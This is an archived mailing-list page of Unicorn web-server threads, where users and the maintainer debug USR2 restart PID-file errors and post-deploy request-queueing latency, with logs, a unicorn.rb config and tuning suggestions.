> Kevin Yank <kyank@avalanche.com.au> wrote:
>> When I send USR2 to the master process (PID 19216 in this example), I
>> get the following in the Unicorn log:
>> 
>> I, [2015-03-11T23:47:33.992274 #6848]  INFO -- : executing ["/srv/ourapp/shared/bundle/ruby/2.2.0/bin/unicorn", "/srv/ourapp/current/config.ru", "-Dc", "/srv/ourapp/shared/config/unicorn.rb", {10=>#<Kgio::UNIXServer:/srv/ourapp/shared/sockets/unicorn.sock>}] (in /srv/ourapp/releases/a0e8b5df474ad5129200654f92a76af00a750f47)
>> I, [2015-03-11T23:47:36.504235 #6848]  INFO -- : inherited addr=/srv/ourapp/shared/sockets/unicorn.sock fd=10
>> /srv/ourapp/shared/bundle/ruby/2.2.0/gems/unicorn-4.8.1/lib/unicorn/http_server.rb:206:in `pid=': Already running on PID:19216 (or pid=/srv/ourapp/shared/pids/unicorn.pid is stale) (ArgumentError)
> 
> Nothing suspicious until the above line...

That’s right.

>> And when I check, indeed, there is now unicorn.pid and
>> unicorn.pid.oldbin, both containing 19216.
> 
> Any chance you have a process manager or something else creating the
> (non-.oldbin) pid file behind unicorn's back?

It’s possible; I’m using eye (https://github.com/kostya/eye) as a process monitor. I’m not aware of it writing .pid files for processes that self-daemonize like Unicorn, though. And once one of my servers “goes bad” (i.e. Unicorn starts failing to restart in response to a USR2), it does so 100% consistently until I stop and restart Unicorn entirely. Based on that, I don’t believe it’s a race condition where my process monitor is slipping in a new unicorn.pid file some of the time.

> Can you check your process table to ensure there's not multiple
> unicorn instances running off the same config and pid files, too?

As far as I can tell, I have some servers that have gotten themselves into this “USR2 restart fails” state, while others are working just fine. In both cases, the Unicorn process tree (as show in htop) looks like this “at rest” (i.e. no deployments/restarts in progress):

unicorn master
`- unicorn master
`- unicorn worker[2]
|  `- unicorn worker[2]
`- unicorn worker[1]
|  `- unicorn worker[1]
`- unicorn worker[0]
   `- unicorn worker[0]

At first glance I’d definitely say it appears that I have two masters running from the same config files. However, there’s only one unicorn.pid file of course (the root process in the tree above), and when I try to kill -TERM the master process that doesn’t have a .pid file, the entire process tree exits. Am I misinterpreting the process table? Is this process list actually normal?

Thus far I’ve been unable to find any difference in state between a properly-behaving server and a misbehaving server, apart from the behaviour of the Unicorn master when it receives a USR2.

> Also, were there other activity (another USR2 or HUP) in the logs
> a few seconds beforehand?

No, didn’t see anything like that (and I was looking for it).

> What kind of filesystem / kernel is the pid file on?

EXT4 / Ubuntu Server 12.04 LTS

> A network FS or anything without the consistency guarantees provided
> by POSIX would not work for pid files.

Given my environment above, I should be OK, right?

> pid files are unfortunately prone to nasty race conditions,
> but I'm not sure what you're seeing happens very often.

This has been happening pretty frequently across multiple server instances, and again once it starts happening on an instance, it keeps happening 100% of the time (until I restart Unicorn completely). So it’s not a rare edge case.

> -------------------8<-------------------
>>  sleep 10
>> 
>>  old_pid = "#{server.config[:pid]}.oldbin"
>>  if File.exists?(old_pid) && server.pid != old_pid
>>    begin
>>      Process.kill("QUIT", File.read(old_pid).to_i)
>>    rescue Errno::ENOENT, Errno::ESRCH
>>      # someone else did our job for us
>>    end
>>  end
> -------------------8<-------------------
> 
> I'd get rid of that hunk starting with the "sleep 10" (at least while
> debugging this issue).

If I simply delete this hunk, I’ll have old masters left running on my servers because they’ll never get sent the QUIT signal. I can definitely remove it temporarily (and kill the old master myself) while debugging, though.

> If you did a USR2 previously, maybe it could
> affect the current USR2 upgrade process.  Sleeping so long in the master
> like that is pretty bad; it throws off timing and delays signal handling.

I’d definitely like to get rid of the sleep, as my restarts definitely feel slow. I’m not clear on what a better approach would be, though.

> That's a pretty fragile config and I regret ever including it in the
> example config files

Any better examples/docs you’d recommend I consult for guidance? Or is expecting to achieve a robust zero-downtime restart using before_fork/after_fork hooks unrealistic?

--
Kevin Yank
Chief Technology Officer, Avalanche Technology Group
http://avalanche.com.au/

ph: +61 4 2241 0083




^ permalink raw reply	[relevance 8%]

* Re: On USR2, new master runs with same PID
  2015-03-12  1:04  5% On USR2, new master runs with same PID Kevin Yank
@ 2015-03-12  1:45 10% ` Eric Wong
  2015-03-12  6:26  8%   ` Kevin Yank
  0 siblings, 1 reply; 200+ results
From: Eric Wong @ 2015-03-12  1:45 UTC (permalink / raw)
  To: Kevin Yank; +Cc: unicorn-public

Kevin Yank <kyank@avalanche.com.au> wrote:
> Having recently migrated our Rails app to MRI 2.2.0 (which may or may
> not be related), we’re experiencing problems with our Unicorn
> zero-downtime restarts.
> 
> When I send USR2 to the master process (PID 19216 in this example), I
> get the following in the Unicorn log:
>
> I, [2015-03-11T23:47:33.992274 #6848]  INFO -- : executing ["/srv/ourapp/shared/bundle/ruby/2.2.0/bin/unicorn", "/srv/ourapp/current/config.ru", "-Dc", "/srv/ourapp/shared/config/unicorn.rb", {10=>#<Kgio::UNIXServer:/srv/ourapp/shared/sockets/unicorn.sock>}] (in /srv/ourapp/releases/a0e8b5df474ad5129200654f92a76af00a750f47)
> I, [2015-03-11T23:47:36.504235 #6848]  INFO -- : inherited addr=/srv/ourapp/shared/sockets/unicorn.sock fd=10
> /srv/ourapp/shared/bundle/ruby/2.2.0/gems/unicorn-4.8.1/lib/unicorn/http_server.rb:206:in `pid=': Already running on PID:19216 (or pid=/srv/ourapp/shared/pids/unicorn.pid is stale) (ArgumentError)

Nothing suspicious until the above line...

<snip>

> And when I check, indeed, there is now unicorn.pid and
> unicorn.pid.oldbin, both containing 19216.
> 
> What could cause this situation to arise?

Any chance you have a process manager or something else creating the
(non-.oldbin) pid file behind unicorn's back?

Can you check your process table to ensure there's not multiple
unicorn instances running off the same config and pid files, too?

Also, were there other activity (another USR2 or HUP) in the logs
a few seconds beforehand?

What kind of filesystem / kernel is the pid file on?
A network FS or anything without the consistency guarantees provided
by POSIX would not work for pid files.

pid files are unfortunately prone to nasty race conditions,
but I'm not sure what you're seeing happens very often.

Likewise, the check for stale Unix domain socket paths at startup is
inevitably racy, too, but the window is usually small enough to be
unnoticeable.  But yes, just in case, check the process table to make
sure there aren't multiple, non-related masters running on off the
same paths.

<snip>

> before_fork do |server, worker|
>   ActiveRecord::Base.connection.disconnect!

-------------------8<-------------------
>   sleep 10
> 
>   old_pid = "#{server.config[:pid]}.oldbin"
>   if File.exists?(old_pid) && server.pid != old_pid
>     begin
>       Process.kill("QUIT", File.read(old_pid).to_i)
>     rescue Errno::ENOENT, Errno::ESRCH
>       # someone else did our job for us
>     end
>   end
-------------------8<-------------------

I'd get rid of that hunk starting with the "sleep 10" (at least while
debugging this issue).  If you did a USR2 previously, maybe it could
affect the current USR2 upgrade process.  Sleeping so long in the master
like that is pretty bad; it throws off timing and delays signal handling.

That's a pretty fragile config and I regret ever including it in the
example config files

^ permalink raw reply	[relevance 10%]

* On USR2, new master runs with same PID
@ 2015-03-12  1:04  5% Kevin Yank
  2015-03-12  1:45 10% ` Eric Wong
  0 siblings, 1 reply; 200+ results
From: Kevin Yank @ 2015-03-12  1:04 UTC (permalink / raw)
  To: unicorn-public

Having recently migrated our Rails app to MRI 2.2.0 (which may or may not be related), we’re experiencing problems with our Unicorn zero-downtime restarts.

When I send USR2 to the master process (PID 19216 in this example), I get the following in the Unicorn log:

I, [2015-03-11T23:47:33.992274 #6848]  INFO -- : executing ["/srv/ourapp/shared/bundle/ruby/2.2.0/bin/unicorn", "/srv/ourapp/current/config.ru", "-Dc", "/srv/ourapp/shared/config/unicorn.rb", {10=>#<Kgio::UNIXServer:/srv/ourapp/shared/sockets/unicorn.sock>}] (in /srv/ourapp/releases/a0e8b5df474ad5129200654f92a76af00a750f47)
I, [2015-03-11T23:47:36.504235 #6848]  INFO -- : inherited addr=/srv/ourapp/shared/sockets/unicorn.sock fd=10
/srv/ourapp/shared/bundle/ruby/2.2.0/gems/unicorn-4.8.1/lib/unicorn/http_server.rb:206:in `pid=': Already running on PID:19216 (or pid=/srv/ourapp/shared/pids/unicorn.pid is stale) (ArgumentError)
  from /srv/ourapp/shared/bundle/ruby/2.2.0/gems/unicorn-4.8.1/lib/unicorn/http_server.rb:134:in `start'
  from /srv/ourapp/shared/bundle/ruby/2.2.0/gems/unicorn-4.8.1/bin/unicorn:126:in `<top (required)>'
  from /srv/ourapp/shared/bundle/ruby/2.2.0/bin/unicorn:23:in `load'
  from /srv/ourapp/shared/bundle/ruby/2.2.0/bin/unicorn:23:in `<main>'
E, [2015-03-11T23:47:36.519549 #19216] ERROR -- : reaped #<Process::Status: pid 6848 exit 1> exec()-ed
E, [2015-03-11T23:47:36.520296 #19216] ERROR -- : master loop error: Already running on PID:19216 (or pid=/srv/ourapp/shared/pids/unicorn.pid is stale) (ArgumentError)
E, [2015-03-11T23:47:36.520496 #19216] ERROR -- : /srv/ourapp/shared/bundle/ruby/2.2.0/gems/unicorn-4.8.1/lib/unicorn/http_server.rb:206:in `pid='
E, [2015-03-11T23:47:36.520650 #19216] ERROR -- : /srv/ourapp/shared/bundle/ruby/2.2.0/gems/unicorn-4.8.1/lib/unicorn/http_server.rb:404:in `reap_all_workers'
E, [2015-03-11T23:47:36.520790 #19216] ERROR -- : /srv/ourapp/shared/bundle/ruby/2.2.0/gems/unicorn-4.8.1/lib/unicorn/http_server.rb:279:in `join'
E, [2015-03-11T23:47:36.520928 #19216] ERROR -- : /srv/ourapp/shared/bundle/ruby/2.2.0/gems/unicorn-4.8.1/bin/unicorn:126:in `<top (required)>'
E, [2015-03-11T23:47:36.521115 #19216] ERROR -- : /srv/ourapp/shared/bundle/ruby/2.2.0/bin/unicorn:23:in `load'
E, [2015-03-11T23:47:36.521254 #19216] ERROR -- : /srv/ourapp/shared/bundle/ruby/2.2.0/bin/unicorn:23:in `<main>’

And when I check, indeed, there is now unicorn.pid and unicorn.pid.oldbin, both containing 19216.

What could cause this situation to arise?


Here’s my unicorn.rb FWIW:

# Set your full path to application.
app_path = "/srv/ourapp/current"

# Set unicorn options
worker_processes 3
preload_app true
timeout 30
listen "/srv/ourapp/shared/sockets/unicorn.sock", :backlog => 64

# Spawn unicorn master worker for user deploy (group: deploy)
user 'deploy', 'deploy'

# Fill path to your app
working_directory app_path

# Should be 'production' by default, otherwise use other env
rails_env = ENV['RAILS_ENV'] || 'production'

# Log everything to one file
stderr_path "/srv/ourapp/shared/log/unicorn.log"
stdout_path "/srv/ourapp/shared/log/unicorn.log"

# Set master PID location
pid "/srv/ourapp/shared/pids/unicorn.pid"

before_exec do |server|
  ENV["BUNDLE_GEMFILE"] = "#{app_path}/Gemfile"
end

before_fork do |server, worker|
  ActiveRecord::Base.connection.disconnect!

  sleep 10

  old_pid = "#{server.config[:pid]}.oldbin"
  if File.exists?(old_pid) && server.pid != old_pid
    begin
      Process.kill("QUIT", File.read(old_pid).to_i)
    rescue Errno::ENOENT, Errno::ESRCH
      # someone else did our job for us
    end
  end
end

after_fork do |server, worker|
  ActiveRecord::Base.establish_connection

  Sidekiq.configure_client do |config|
    config.redis = { namespace: 'sidekiq' }
  end
end


--
Kevin Yank
Chief Technology Officer, Avalanche Technology Group
http://avalanche.com.au/

ph: +61 4 2241 0083



^ permalink raw reply	[relevance 5%]

* Re: Request Queueing after deploy + USR2 restart
  2015-03-05 17:28  3%                     ` Sarkis Varozian
  2015-03-05 17:31  0%                       ` Bráulio Bhavamitra
@ 2015-03-05 17:32  0%                       ` Bráulio Bhavamitra
  1 sibling, 0 replies; 200+ results
From: Bráulio Bhavamitra @ 2015-03-05 17:32 UTC (permalink / raw)
  To: Sarkis Varozian; +Cc: Eric Wong, Michael Fischer, unicorn-public

I also use newrelic and never saw this grey part...

On Thu, Mar 5, 2015 at 2:28 PM, Sarkis Varozian <svarozian@gmail.com> wrote:

> Braulio,
>
> Are you referring to the vertical grey line? That is the deployment event.
> The part that spikes in the first graph is request queue which is a bit
> different on newrelic:
> http://blog.newrelic.com/2013/01/22/understanding-new-relic-queuing/
>
> We are using HAProxy to load balance (round robin) to 4 physical hosts
> running unicorn with 6 workers.
>
> I have not tried to reproduce this on 1 master - I assume this would be
> the same.
>
> I do in fact do the sleep now:
> https://gist.github.com/sarkis/1aa296044b1dfd3695ab#file-unicorn-rb-L37 -
> the deployment results above had the 1 second sleep in there.
>
> On Thu, Mar 5, 2015 at 9:13 AM, Bráulio Bhavamitra <braulio@eita.org.br>
> wrote:
>
>> In the graphs you posted, what is the grey part? It is not described in
>> the legend and it seems the problem is entirely there. What reverse proxy
>> are you using?
>>
>> Can you reproduce this with a single master instance?
>>
>> Could you try this sleep:
>> https://gist.github.com/brauliobo/11298486#file-unicorn-conf-rb-L91
>>
>>
>> On Thu, Mar 5, 2015 at 2:07 PM, Sarkis Varozian <svarozian@gmail.com>
>> wrote:
>>
>>> Hey All,
>>>
>>> So I changed up my unicorn.rb a bit from my original post:
>>> https://gist.github.com/sarkis/1aa296044b1dfd3695ab
>>>
>>> I'm also still sending the USR2 signals on deploy staggered with 30
>>> second delay via capistrano:
>>>
>>> on roles(:web), in: :sequence, wait: 30
>>>
>>> As you can see I am now doing a warup via rack MockRequest (I hoped this
>>> would warmup the master). However, this is what a deploy looks like on
>>> newrelic:
>>>
>>>
>>> https://www.dropbox.com/s/beh7nc8npdfijqp/Screenshot%202015-03-05%2009.05.15.png?dl=0
>>>
>>>
>>> https://www.dropbox.com/s/w08gpvp7mpik3vs/Screenshot%202015-03-05%2009.06.51.png?dl=0
>>>
>>> I'm running out of ideas to get rid of thse latency spikes. Would you
>>> guys recommend I try anything else at this point?
>>>
>>>
>>>
>>> On Wed, Mar 4, 2015 at 12:40 PM, Sarkis Varozian <svarozian@gmail.com>
>>> wrote:
>>>
>>>> Eric,
>>>>
>>>> Thanks for the quick reply.
>>>>
>>>> We are on Ruby 2.1.5p273 and unicorn 4.8.3. I believe our problem is
>>>> the lazy loading - at least thats what all signs point to. I am going to
>>>> try and mock request some url endpoints. Currently, I can only think of
>>>> '/', as most other parts of the app require a session and auth. I'll report
>>>> back with results.
>>>>
>>>>
>>>>
>>>> On Wed, Mar 4, 2015 at 12:35 PM, Eric Wong <e@80x24.org> wrote:
>>>>
>>>>> Sarkis Varozian <svarozian@gmail.com> wrote:
>>>>> > On Wed, Mar 4, 2015 at 12:17 PM, Michael Fischer <
>>>>> mfischer@zendesk.com>
>>>>> > wrote:
>>>>> >
>>>>> > > I'm not exactly sure how preload_app works, but I suspect your app
>>>>> is
>>>>> > > lazy-loading a number of Ruby libraries while handling the first
>>>>> few
>>>>> > > requests that weren't automatically loaded during the preload
>>>>> process.
>>>>> > >
>>>>> > > Eric, your thoughts?
>>>>>
>>>>> (top-posting corrected)
>>>>>
>>>>> Yeah, preload_app won't help startup speed if much of the app is
>>>>> autoloaded.
>>>>>
>>>>> Sarkis: which Ruby version are you running?  IIRC, 1.9.2 had terrible
>>>>> startup performance compared to 1.9.3 and later in case you're stuck on
>>>>> 1.9.2
>>>>>
>>>>> > That does make sense - I was looking at another suggestion from a
>>>>> user here
>>>>> > (Braulio) of running a "warmup" using rack MockRequest:
>>>>> > https://gist.github.com/brauliobo/11298486#file-unicorn-conf-rb-L77
>>>>> >
>>>>> > The only issue I am having with the above solution is it is
>>>>> happening in
>>>>> > the before_fork block - shouldn't I warmup the connection in
>>>>> after_fork?
>>>>>
>>>>> If preload_app is true, you can warmup in before_fork; otherwise it
>>>>> needs to be after_fork.
>>>>>
>>>>> > If
>>>>> > I follow the above gist properly it warms up the server with the old
>>>>> > activerecord base connection and then its turned off, then turned
>>>>> back on
>>>>> > in after_fork. I think I am not understanding the sequence of events
>>>>> > there...
>>>>>
>>>>> With preload_app and warmup, you need to ensure any stream connections
>>>>> (DB, memcached, redis, etc..) do not get shared between processes, so
>>>>> it's standard practice to disconnect in the parent and reconnect in the
>>>>> child.
>>>>>
>>>>> > If this is the case, I should warmup and also check/kill the old
>>>>> > master in the after_fork block after the new db, redis, neo4j
>>>>> connections
>>>>> > are all created. Thoughts?
>>>>>
>>>>> I've been leaving killing the master outside of the unicorn hooks
>>>>> and doing it as a separate step; seemed too fragile to do it in
>>>>> hooks from my perspective.
>>>>>
>>>>
>>>>
>>>>
>>>> --
>>>> *Sarkis Varozian*
>>>> svarozian@gmail.com
>>>>
>>>
>>>
>>>
>>> --
>>> *Sarkis Varozian*
>>> svarozian@gmail.com
>>>
>>
>>
>>
>> --
>> "Lute pela sua ideologia. Seja um com sua ideologia. Viva pela sua
>> ideologia. Morra por sua ideologia" P.R. Sarkar
>>
>> EITA - Educação, Informação e Tecnologias para Autogestão
>> http://cirandas.net/brauliobo
>> http://eita.org.br
>>
>> "Paramapurusha é meu pai e Parama Prakriti é minha mãe. O universo é meu
>> lar e todos nós somos cidadãos deste cosmo. Este universo é a imaginação da
>> Mente Macrocósmica, e todas as entidades estão sendo criadas, preservadas e
>> destruídas nas fases de extroversão e introversão do fluxo imaginativo
>> cósmico. No âmbito pessoal, quando uma pessoa imagina algo em sua mente,
>> naquele momento, essa pessoa é a única proprietária daquilo que ela
>> imagina, e ninguém mais. Quando um ser humano criado mentalmente caminha
>> por um milharal também imaginado, a pessoa imaginada não é a propriedade
>> desse milharal, pois ele pertence ao indivíduo que o está imaginando. Este
>> universo foi criado na imaginação de Brahma, a Entidade Suprema, por isso
>> a propriedade deste universo é de Brahma, e não dos microcosmos que também
>> foram criados pela imaginação de Brahma. Nenhuma propriedade deste mundo,
>> mutável ou imutável, pertence a um indivíduo em particular; tudo é o
>> patrimônio comum de todos."
>> Restante do texto em
>> http://cirandas.net/brauliobo/blog/a-problematica-de-hoje-em-dia
>>
>
>
>
> --
> *Sarkis Varozian*
> svarozian@gmail.com
>



-- 
"Lute pela sua ideologia. Seja um com sua ideologia. Viva pela sua
ideologia. Morra por sua ideologia" P.R. Sarkar

EITA - Educação, Informação e Tecnologias para Autogestão
http://cirandas.net/brauliobo
http://eita.org.br

"Paramapurusha é meu pai e Parama Prakriti é minha mãe. O universo é meu
lar e todos nós somos cidadãos deste cosmo. Este universo é a imaginação da
Mente Macrocósmica, e todas as entidades estão sendo criadas, preservadas e
destruídas nas fases de extroversão e introversão do fluxo imaginativo
cósmico. No âmbito pessoal, quando uma pessoa imagina algo em sua mente,
naquele momento, essa pessoa é a única proprietária daquilo que ela
imagina, e ninguém mais. Quando um ser humano criado mentalmente caminha
por um milharal também imaginado, a pessoa imaginada não é a propriedade
desse milharal, pois ele pertence ao indivíduo que o está imaginando. Este
universo foi criado na imaginação de Brahma, a Entidade Suprema, por isso
a propriedade deste universo é de Brahma, e não dos microcosmos que também
foram criados pela imaginação de Brahma. Nenhuma propriedade deste mundo,
mutável ou imutável, pertence a um indivíduo em particular; tudo é o
patrimônio comum de todos."
Restante do texto em
http://cirandas.net/brauliobo/blog/a-problematica-de-hoje-em-dia


^ permalink raw reply	[relevance 0%]

* Re: Request Queueing after deploy + USR2 restart
  2015-03-05 17:28  3%                     ` Sarkis Varozian
@ 2015-03-05 17:31  0%                       ` Bráulio Bhavamitra
  2015-03-05 17:32  0%                       ` Bráulio Bhavamitra
  1 sibling, 0 replies; 200+ results
From: Bráulio Bhavamitra @ 2015-03-05 17:31 UTC (permalink / raw)
  To: Sarkis Varozian; +Cc: Eric Wong, Michael Fischer, unicorn-public

I would try to reproduce this locally with a production env and `ab -n 200
-c 2 http://localhost:3000/`



On Thu, Mar 5, 2015 at 2:28 PM, Sarkis Varozian <svarozian@gmail.com> wrote:

> Braulio,
>
> Are you referring to the vertical grey line? That is the deployment event.
> The part that spikes in the first graph is request queue which is a bit
> different on newrelic:
> http://blog.newrelic.com/2013/01/22/understanding-new-relic-queuing/
>
> We are using HAProxy to load balance (round robin) to 4 physical hosts
> running unicorn with 6 workers.
>
> I have not tried to reproduce this on 1 master - I assume this would be
> the same.
>
> I do in fact do the sleep now:
> https://gist.github.com/sarkis/1aa296044b1dfd3695ab#file-unicorn-rb-L37 -
> the deployment results above had the 1 second sleep in there.
>
> On Thu, Mar 5, 2015 at 9:13 AM, Bráulio Bhavamitra <braulio@eita.org.br>
> wrote:
>
>> In the graphs you posted, what is the grey part? It is not described in
>> the legend and it seems the problem is entirely there. What reverse proxy
>> are you using?
>>
>> Can you reproduce this with a single master instance?
>>
>> Could you try this sleep:
>> https://gist.github.com/brauliobo/11298486#file-unicorn-conf-rb-L91
>>
>>
>> On Thu, Mar 5, 2015 at 2:07 PM, Sarkis Varozian <svarozian@gmail.com>
>> wrote:
>>
>>> Hey All,
>>>
>>> So I changed up my unicorn.rb a bit from my original post:
>>> https://gist.github.com/sarkis/1aa296044b1dfd3695ab
>>>
>>> I'm also still sending the USR2 signals on deploy staggered with 30
>>> second delay via capistrano:
>>>
>>> on roles(:web), in: :sequence, wait: 30
>>>
>>> As you can see I am now doing a warup via rack MockRequest (I hoped this
>>> would warmup the master). However, this is what a deploy looks like on
>>> newrelic:
>>>
>>>
>>> https://www.dropbox.com/s/beh7nc8npdfijqp/Screenshot%202015-03-05%2009.05.15.png?dl=0
>>>
>>>
>>> https://www.dropbox.com/s/w08gpvp7mpik3vs/Screenshot%202015-03-05%2009.06.51.png?dl=0
>>>
>>> I'm running out of ideas to get rid of thse latency spikes. Would you
>>> guys recommend I try anything else at this point?
>>>
>>>
>>>
>>> On Wed, Mar 4, 2015 at 12:40 PM, Sarkis Varozian <svarozian@gmail.com>
>>> wrote:
>>>
>>>> Eric,
>>>>
>>>> Thanks for the quick reply.
>>>>
>>>> We are on Ruby 2.1.5p273 and unicorn 4.8.3. I believe our problem is
>>>> the lazy loading - at least thats what all signs point to. I am going to
>>>> try and mock request some url endpoints. Currently, I can only think of
>>>> '/', as most other parts of the app require a session and auth. I'll report
>>>> back with results.
>>>>
>>>>
>>>>
>>>> On Wed, Mar 4, 2015 at 12:35 PM, Eric Wong <e@80x24.org> wrote:
>>>>
>>>>> Sarkis Varozian <svarozian@gmail.com> wrote:
>>>>> > On Wed, Mar 4, 2015 at 12:17 PM, Michael Fischer <
>>>>> mfischer@zendesk.com>
>>>>> > wrote:
>>>>> >
>>>>> > > I'm not exactly sure how preload_app works, but I suspect your app
>>>>> is
>>>>> > > lazy-loading a number of Ruby libraries while handling the first
>>>>> few
>>>>> > > requests that weren't automatically loaded during the preload
>>>>> process.
>>>>> > >
>>>>> > > Eric, your thoughts?
>>>>>
>>>>> (top-posting corrected)
>>>>>
>>>>> Yeah, preload_app won't help startup speed if much of the app is
>>>>> autoloaded.
>>>>>
>>>>> Sarkis: which Ruby version are you running?  IIRC, 1.9.2 had terrible
>>>>> startup performance compared to 1.9.3 and later in case you're stuck on
>>>>> 1.9.2
>>>>>
>>>>> > That does make sense - I was looking at another suggestion from a
>>>>> user here
>>>>> > (Braulio) of running a "warmup" using rack MockRequest:
>>>>> > https://gist.github.com/brauliobo/11298486#file-unicorn-conf-rb-L77
>>>>> >
>>>>> > The only issue I am having with the above solution is it is
>>>>> happening in
>>>>> > the before_fork block - shouldn't I warmup the connection in
>>>>> after_fork?
>>>>>
>>>>> If preload_app is true, you can warmup in before_fork; otherwise it
>>>>> needs to be after_fork.
>>>>>
>>>>> > If
>>>>> > I follow the above gist properly it warms up the server with the old
>>>>> > activerecord base connection and then its turned off, then turned
>>>>> back on
>>>>> > in after_fork. I think I am not understanding the sequence of events
>>>>> > there...
>>>>>
>>>>> With preload_app and warmup, you need to ensure any stream connections
>>>>> (DB, memcached, redis, etc..) do not get shared between processes, so
>>>>> it's standard practice to disconnect in the parent and reconnect in the
>>>>> child.
>>>>>
>>>>> > If this is the case, I should warmup and also check/kill the old
>>>>> > master in the after_fork block after the new db, redis, neo4j
>>>>> connections
>>>>> > are all created. Thoughts?
>>>>>
>>>>> I've been leaving killing the master outside of the unicorn hooks
>>>>> and doing it as a separate step; seemed too fragile to do it in
>>>>> hooks from my perspective.
>>>>>
>>>>
>>>>
>>>>
>>>> --
>>>> *Sarkis Varozian*
>>>> svarozian@gmail.com
>>>>
>>>
>>>
>>>
>>> --
>>> *Sarkis Varozian*
>>> svarozian@gmail.com
>>>
>>
>>
>>
>> --
>> "Lute pela sua ideologia. Seja um com sua ideologia. Viva pela sua
>> ideologia. Morra por sua ideologia" P.R. Sarkar
>>
>> EITA - Educação, Informação e Tecnologias para Autogestão
>> http://cirandas.net/brauliobo
>> http://eita.org.br
>>
>> "Paramapurusha é meu pai e Parama Prakriti é minha mãe. O universo é meu
>> lar e todos nós somos cidadãos deste cosmo. Este universo é a imaginação da
>> Mente Macrocósmica, e todas as entidades estão sendo criadas, preservadas e
>> destruídas nas fases de extroversão e introversão do fluxo imaginativo
>> cósmico. No âmbito pessoal, quando uma pessoa imagina algo em sua mente,
>> naquele momento, essa pessoa é a única proprietária daquilo que ela
>> imagina, e ninguém mais. Quando um ser humano criado mentalmente caminha
>> por um milharal também imaginado, a pessoa imaginada não é a propriedade
>> desse milharal, pois ele pertence ao indivíduo que o está imaginando. Este
>> universo foi criado na imaginação de Brahma, a Entidade Suprema, por isso
>> a propriedade deste universo é de Brahma, e não dos microcosmos que também
>> foram criados pela imaginação de Brahma. Nenhuma propriedade deste mundo,
>> mutável ou imutável, pertence a um indivíduo em particular; tudo é o
>> patrimônio comum de todos."
>> Restante do texto em
>> http://cirandas.net/brauliobo/blog/a-problematica-de-hoje-em-dia
>>
>
>
>
> --
> *Sarkis Varozian*
> svarozian@gmail.com
>



-- 
"Lute pela sua ideologia. Seja um com sua ideologia. Viva pela sua
ideologia. Morra por sua ideologia" P.R. Sarkar

EITA - Educação, Informação e Tecnologias para Autogestão
http://cirandas.net/brauliobo
http://eita.org.br

"Paramapurusha é meu pai e Parama Prakriti é minha mãe. O universo é meu
lar e todos nós somos cidadãos deste cosmo. Este universo é a imaginação da
Mente Macrocósmica, e todas as entidades estão sendo criadas, preservadas e
destruídas nas fases de extroversão e introversão do fluxo imaginativo
cósmico. No âmbito pessoal, quando uma pessoa imagina algo em sua mente,
naquele momento, essa pessoa é a única proprietária daquilo que ela
imagina, e ninguém mais. Quando um ser humano criado mentalmente caminha
por um milharal também imaginado, a pessoa imaginada não é a propriedade
desse milharal, pois ele pertence ao indivíduo que o está imaginando. Este
universo foi criado na imaginação de Brahma, a Entidade Suprema, por isso
a propriedade deste universo é de Brahma, e não dos microcosmos que também
foram criados pela imaginação de Brahma. Nenhuma propriedade deste mundo,
mutável ou imutável, pertence a um indivíduo em particular; tudo é o
patrimônio comum de todos."
Restante do texto em
http://cirandas.net/brauliobo/blog/a-problematica-de-hoje-em-dia


^ permalink raw reply	[relevance 0%]

* Re: Request Queueing after deploy + USR2 restart
  @ 2015-03-05 17:28  3%                     ` Sarkis Varozian
  2015-03-05 17:31  0%                       ` Bráulio Bhavamitra
  2015-03-05 17:32  0%                       ` Bráulio Bhavamitra
  0 siblings, 2 replies; 200+ results
From: Sarkis Varozian @ 2015-03-05 17:28 UTC (permalink / raw)
  To: Bráulio Bhavamitra; +Cc: Eric Wong, Michael Fischer, unicorn-public

Braulio,

Are you referring to the vertical grey line? That is the deployment event.
The part that spikes in the first graph is request queue which is a bit
different on newrelic:
http://blog.newrelic.com/2013/01/22/understanding-new-relic-queuing/

We are using HAProxy to load balance (round robin) to 4 physical hosts
running unicorn with 6 workers.

I have not tried to reproduce this on 1 master - I assume this would be the
same.

I do in fact do the sleep now:
https://gist.github.com/sarkis/1aa296044b1dfd3695ab#file-unicorn-rb-L37 -
the deployment results above had the 1 second sleep in there.

On Thu, Mar 5, 2015 at 9:13 AM, Bráulio Bhavamitra <braulio@eita.org.br>
wrote:

> In the graphs you posted, what is the grey part? It is not described in
> the legend and it seems the problem is entirely there. What reverse proxy
> are you using?
>
> Can you reproduce this with a single master instance?
>
> Could you try this sleep:
> https://gist.github.com/brauliobo/11298486#file-unicorn-conf-rb-L91
>
>
> On Thu, Mar 5, 2015 at 2:07 PM, Sarkis Varozian <svarozian@gmail.com>
> wrote:
>
>> Hey All,
>>
>> So I changed up my unicorn.rb a bit from my original post:
>> https://gist.github.com/sarkis/1aa296044b1dfd3695ab
>>
>> I'm also still sending the USR2 signals on deploy staggered with 30
>> second delay via capistrano:
>>
>> on roles(:web), in: :sequence, wait: 30
>>
>> As you can see I am now doing a warup via rack MockRequest (I hoped this
>> would warmup the master). However, this is what a deploy looks like on
>> newrelic:
>>
>>
>> https://www.dropbox.com/s/beh7nc8npdfijqp/Screenshot%202015-03-05%2009.05.15.png?dl=0
>>
>>
>> https://www.dropbox.com/s/w08gpvp7mpik3vs/Screenshot%202015-03-05%2009.06.51.png?dl=0
>>
>> I'm running out of ideas to get rid of thse latency spikes. Would you
>> guys recommend I try anything else at this point?
>>
>>
>>
>> On Wed, Mar 4, 2015 at 12:40 PM, Sarkis Varozian <svarozian@gmail.com>
>> wrote:
>>
>>> Eric,
>>>
>>> Thanks for the quick reply.
>>>
>>> We are on Ruby 2.1.5p273 and unicorn 4.8.3. I believe our problem is the
>>> lazy loading - at least thats what all signs point to. I am going to try
>>> and mock request some url endpoints. Currently, I can only think of '/', as
>>> most other parts of the app require a session and auth. I'll report back
>>> with results.
>>>
>>>
>>>
>>> On Wed, Mar 4, 2015 at 12:35 PM, Eric Wong <e@80x24.org> wrote:
>>>
>>>> Sarkis Varozian <svarozian@gmail.com> wrote:
>>>> > On Wed, Mar 4, 2015 at 12:17 PM, Michael Fischer <
>>>> mfischer@zendesk.com>
>>>> > wrote:
>>>> >
>>>> > > I'm not exactly sure how preload_app works, but I suspect your app
>>>> is
>>>> > > lazy-loading a number of Ruby libraries while handling the first few
>>>> > > requests that weren't automatically loaded during the preload
>>>> process.
>>>> > >
>>>> > > Eric, your thoughts?
>>>>
>>>> (top-posting corrected)
>>>>
>>>> Yeah, preload_app won't help startup speed if much of the app is
>>>> autoloaded.
>>>>
>>>> Sarkis: which Ruby version are you running?  IIRC, 1.9.2 had terrible
>>>> startup performance compared to 1.9.3 and later in case you're stuck on
>>>> 1.9.2
>>>>
